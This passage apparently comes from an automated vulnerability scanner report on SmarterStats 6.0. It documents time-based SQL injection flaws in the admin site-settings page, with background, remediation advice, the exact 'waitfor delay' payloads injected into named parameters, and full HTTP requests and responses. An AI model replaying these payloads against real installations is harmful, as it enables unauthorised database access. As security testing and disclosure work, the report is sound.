ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%249=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2416=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%242=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2410=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2417=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%243=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2411=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2418=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%244=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2412=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2419=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%245=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2413=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2420=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%246=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2421=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%247=on&ctl00_MPH_grdLogStatus_HiddenInput=&ctl00_MPH_grdLogStatus_HiddenLSR=&ctl00_MPH_grdSeoStatus_HiddenInput=&ctl00_MPH_grdSeoStatus_HiddenLSR=&__ASYNCPOST=true&

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3932.23369
Date: Mon, 11 Oct 2010 23:53:39 GMT
Content-Length: 0


2. SQL injection
There are 23 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



2.1. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00%24MPH%24txtSmarterLogDirectory parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmSite.aspx

Issue detail

The ctl00%24MPH%24txtSmarterLogDirectory parameter appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the ctl00%24MPH%24txtSmarterLogDirectory parameter. The application took 25540 milliseconds to respond to the request, compared with 134 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

POST /Admin/frmSite.aspx?SiteId=1&popup=true HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx?SiteId=1&popup=true
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;
Content-Type: application/x-www-form-urlencoded
Content-Length: 30128

ctl00%24MPH%24txtDefaultDocuments_SettingText=%0d%0aindex.htm%0d%0aindex.html%0d%0adefault.asp%0d%0adefault.aspx&__LASTFOCUS=&ctl00%24MPH%24lstServer_SettingDropDown=1&__EVENTTARGET=&__EVENTARGUMENT=&ctl00%24MPH%24txtSmarterLogDirectory=C%3a%5cSmarterLogs'waitfor%20delay'0%3a0%3a20'--&ctl00%24MPH%24lstLogFormat_SettingDropDown=IIS&ctl00%24MPH%24VisiblePage=ctl00_MPH_OptionsTab&ctl00%24MPH%24grdLogLocationsCheckAll=on&ctl00%24MPH%24lstMonthsToKeepSmStats_SettingDropDown=1&ctl00%24MPH%24txtLogFileExportLocURL_SettingText=555-555-0199@example.com&ctl00_MPH_grdSeoStatus_HiddenLSR=&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%243=on&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxRanking_SettingText=100&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%242=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%241=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%240=on&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxCompetitors_SettingText=5&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%249=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%248=on&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText=5&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%247=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%246=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%245=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2421=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%244=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2420=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2417=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2418=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2415=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2416=on&ctl00%24MPH%24txtDomainUrl_SettingText=555-555-0199@example.com&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2419=on&ctl00_MPH_grdLogStatus_HiddenInput=&ctl00_MPH_grdLogStatus_HiddenLSR=&ctl00%24MPH%24chkStripAfterSemi_SettingCheck=on&ctl00_MPH_grdLogLocations_HiddenInput=&ctl00%24MPH%24txtDomainName_SettingText=hoyt.net&ctl00%24MPH%24chkSeoEnabled_SettingCheck=on&ctl00_MPH_grdSeoStatus_HiddenInput=&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2410=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414=on&ctl00%24TPH%24HyperTabStrip1%24SelectedTab=ctl00_TPH_HyperTabStrip1_HyperTabItem1&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2413=on&ctl00%24MPH%24txtExportLogDirectory=555-555-0199@example.com&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2412=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2411=on&ctl00%24MPH%24lstStatus_SettingDropDown=paused&ctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown=hoytnet&ctl00_MPH_grdLogLocations_CB64_OTg3ZTY2NDQzZTUxNDk5MGE4YWZjZmI0NTZhMjMyYzA-=on&__VIEWSTATE=[...]
WJTdHJpcDEkSHlwZXJUYWJJdGVtMg8y3AsAAQAAAP%2f%2f%2f%2f8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8%2f%2f%2f%2f5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6%2f%2f%2f%2f%2fP%2f%2f%2fwYHAAAABFRleHQKAfj%2f%2f%2f%2f8%2f%2f%2f%2fBgkAAAAKUmVzb3VyY2VJRAYKAAAAC0BMb2dPcHRpb25zAfX%2f%2f%2f%
2f8%2f%2f%2f%2fBgwAAAAIU2VsZWN0ZWQIAQAB8%2f%2f%2f%2f%2fz%2f%2f%2f8GDgAAAApQYWdlVmlld0lEBg8AAAANTG9nT3B0aW9uc1RhYgtkO%2bUDWAPhQZDBIN%2fz%2f3gfFlozCpGuJtURlykZelxfX%2f4%3d&ctl00_MPH_grdLogLocations_HiddenLSR=&ctl00%24MPH%24lstLogLocation_SettingDropDown=FTP

Response (redirected)

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 00:00:08 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8607
Connection: Close



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   SmarterStats Login - SmarterStats
</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


   <script type="text/javascript">
       if (parent.isRoot != null)
           parent.location.href = location.href;
       if (parent.parent.isRoot != null)
           parent.parent.location.href = location.href;
   </script>

<link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Login/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="Login" dir="ltr">
   <form name="aspnetForm" method="post" action="login.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="[...]" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>

<script language="javascript">window.onload = function() { if (document.getElementById('ctl00$MPH$txtSiteId') != null) document.getElementById('ctl00$MPH$txtSiteId').focus(); } </script>
<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>
<script src="/WebResource.axd?d=tmbPiP2D38VVojyjJVsEkXwe8X4rw_c60mStWfistR8pyJPOf4ElR79y8d6v9XE45y9Xuon7XBs01GFx3aJPBQ4-yv7YCKPFvc37E1RidaE1&amp;t=634219308989960000" type="text/javascript"></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1',''], [], [], 90, 'ctl00');
//]]>
</script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <div id="ctl00_UpdatePanel1">
   
               <div class="CenteredLogin">
                   <div class="ShadowBox">
                       <div class="LoginBox">
                           <div class="LoginTitle">
                               <div class="RoundedPageTitleLeft">
                                   <div class="RoundedPageTitleRight">
                                       <div class="LoginTitleText">
                                           Login to SmarterStats
                                       </div>
                                   </div>
                               </div>
                           </div>
                           <div class="LoginFrame">
                               <div class="RoundedBottom">
                                   <div class="RoundedLeft">
                                       <div class="RoundedRight">
                                           <div class="RoundedBottomLeft">
                                               <div class="RoundedBottomRight">
                                                   <div id="ctl00_TipTextDiv" class="LoginTipTextContainer">
                                                       
                                                   </div>
                                                   <div class="LoginSpacer">
                                                   </div>
                                                   <div class="LoginContent">
                                                       
<div class="LoginSetting">
<div class="LoginLabel">
Site ID
</div>
<input name="ctl00$MPH$txtSiteId" type="text" id="ctl00_MPH_txtSiteId" tabindex="1" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Username
</div>
<input name="ctl00$MPH$txtUserName" type="text" id="ctl00_MPH_txtUserName" tabindex="2" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Password<br />
</div>
<input name="ctl00$MPH$txtPassword" type="password" id="ctl00_MPH_txtPassword" tabindex="3" style="width: 310px" />
</div>
<div class="LoginSetting">
<span class="LoginRememberMe">
<input id="ctl00_MPH_chkAutoLogin" type="checkbox" name="ctl00$MPH$chkAutoLogin" tabindex="3" /><label for="ctl00_MPH_chkAutoLogin">Remember me</label>
</span>
</div>

                                                   </div>
                                                   <div class="LoginButtons">
                                                       
<select name="ctl00$BPH$LanguageList" onchange="javascript:setTimeout(&#39;__doPostBack(\&#39;ctl00$BPH$LanguageList\&#39;,\&#39;\&#39;)&#39;, 0)" id="ctl00_BPH_LanguageList" tabindex="3">
       <option selected="selected" value="">Use Browser Language</option>
       <option value="en">English</option>

   </select>
<div id="ctl00_BPH_HelpImageButton" class="BBButton"><a class="ButtonBarAnchor" href="http&#x3a;&#x2f;&#x2f;help&#x2e;smartertools&#x2e;com&#x2f;SmarterStats&#x2f;v6&#x2f;default&#x2e;aspx&#x3f;p&#x3d;DA&#x26;v&#x3d;6&#x2e;0&#x2e;3932&#x26;lang&#x3d;en&#x2d;US&#x26;page&#x3d;LoginAdmin" target="helpwindow" onclick="window.open('http\x3a\x2f\x2fhelp\x2esmartertools\x2ecom\x2fSmarterStats\x2fv6\x2fdefault\x2easpx\x3fp\x3dDA\x26v\x3d6\x2e0\x2e3932\x26lang\x3den\x2dUS\x26page\x3dLoginAdmin','helpwindow',''); return false;" tabindex='6'><span class="BBInner">Help</span></a></div>
<div id="ctl00_BPH_LoginImageButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='5' onclick=" __doPostBack('ctl00$BPH$LoginImageButton',''); return false;"><span class="BBInner">Login</span></a></div>
<input type="image" name="ctl00$BPH$btnEnterClick" id="ctl00_BPH_btnEnterClick" tabindex="-1" src="/s.gif" alt=" " style="height:0px;width:0px;border-width:0px;" />

                                                   </div>
                                               </div>
                                           </div>
                                       </div>
                                   </div>
                               </div>
                           </div>
                       </div>
                   </div>
                   <div class="LoginLinks">
                       <a href='http://www.smartertools.com/smarterstats/web-analytics-seo-software.aspx' target='_blank'>SmarterStats Free 6.0</a> | <a href='http://www.smartertools.com/smarterstats/web-analytics-seo-software.aspx' target='_blank'>Web Log Analytics & SEO Software</a> | &copy; 2010 <a href='http://www.smartertools.com/' target='_blank'>SmarterTools Inc.</a>
                   </div>
               </div>
               

                   <script type="text/javascript">
                       $(document).ready(function() {
                           $('select').each(function() {
                               if ($(this).width() > 180) $(this).width(180);
                           });
                       }); </script>

               
           
</div>
       
   

<script type="text/javascript">
//<![CDATA[
WebForm_AutoFocus('ctl00_MPH_txtSiteId');//]]>
</script>
</form>
</body>
</html>


2.2. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxCompetitors_SettingText parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmSite.aspx

Issue detail

The ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxCompetitors_SettingText parameter appears to be vulnerable to SQL injection attacks. The payload waitfor%20delay'0%3a0%3a20'-- was submitted in the ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxCompetitors_SettingText parameter. The application took 16658 milliseconds to respond to the request, compared with 282 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

POST /Admin/frmSite.aspx?SiteId=1&popup=true HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx?SiteId=1&popup=true
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;
Content-Type: application/x-www-form-urlencoded
Content-Length: 30128

ctl00%24MPH%24txtDefaultDocuments_SettingText=%0d%0aindex.htm%0d%0aindex.html%0d%0adefault.asp%0d%0adefault.aspx&__LASTFOCUS=&ctl00%24MPH%24lstServer_SettingDropDown=1&__EVENTTARGET=&__EVENTARGUMENT=&ctl00%24MPH%24txtSmarterLogDirectory=C%3a%5cSmarterLogs&ctl00%24MPH%24lstLogFormat_SettingDropDown=IIS&ctl00%24MPH%24VisiblePage=ctl00_MPH_OptionsTab&ctl00%24MPH%24grdLogLocationsCheckAll=on&ctl00%24MPH%24lstMonthsToKeepSmStats_SettingDropDown=1&ctl00%24MPH%24txtLogFileExportLocURL_SettingText=555-555-0199@example.com&ctl00_MPH_grdSeoStatus_HiddenLSR=&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%243=on&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxRanking_SettingText=100&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%242=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%241=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%240=on&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxCompetitors_SettingText=5waitfor%20delay'0%3a0%3a20'--&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%249=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%248=on&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText=5&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%247=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%246=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%245=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2421=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%244=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2420=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2417=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2418=on&ctl00%24MPH%24ucSiteSeoSearchEngine
Settings%24chklistEngines_SettingCheckBox%2415=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2416=on&ctl00%24MPH%24txtDomainUrl_SettingText=555-555-0199@example.com&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2419=on&ctl00_MPH_grdLogStatus_HiddenInput=&ctl00_MPH_grdLogStatus_HiddenLSR=&ctl00%24MPH%24chkStripAfterSemi_SettingCheck=on&ctl00_MPH_grdLogLocations_HiddenInput=&ctl00%24MPH%24txtDomainName_SettingText=hoyt.net&ctl00%24MPH%24chkSeoEnabled_SettingCheck=on&ctl00_MPH_grdSeoStatus_HiddenInput=&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2410=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414=on&ctl00%24TPH%24HyperTabStrip1%24SelectedTab=ctl00_TPH_HyperTabStrip1_HyperTabItem1&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2413=on&ctl00%24MPH%24txtExportLogDirectory=555-555-0199@example.com&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2412=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2411=on&ctl00%24MPH%24lstStatus_SettingDropDown=paused&ctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown=hoytnet&ctl00_MPH_grdLogLocations_CB64_OTg3ZTY2NDQzZTUxNDk5MGE4YWZjZmI0NTZhMjMyYzA-=on&__VIEWSTATE=[...]&ctl00_MPH_grdLogLocations_HiddenLSR=&ctl00%24MPH%24lstLogLocation_SettingDropDown=FTP

Response (redirected)

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Mon, 11 Oct 2010 23:47:22 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8607
Connection: Close



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   SmarterStats Login - SmarterStats
</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


   <script type="text/javascript">
       if (parent.isRoot != null)
           parent.location.href = location.href;
       if (parent.parent.isRoot != null)
           parent.parent.location.href = location.href;
   </script>

<link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Login/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="Login" dir="ltr">
   <form name="aspnetForm" method="post" action="login.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="[...]" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>

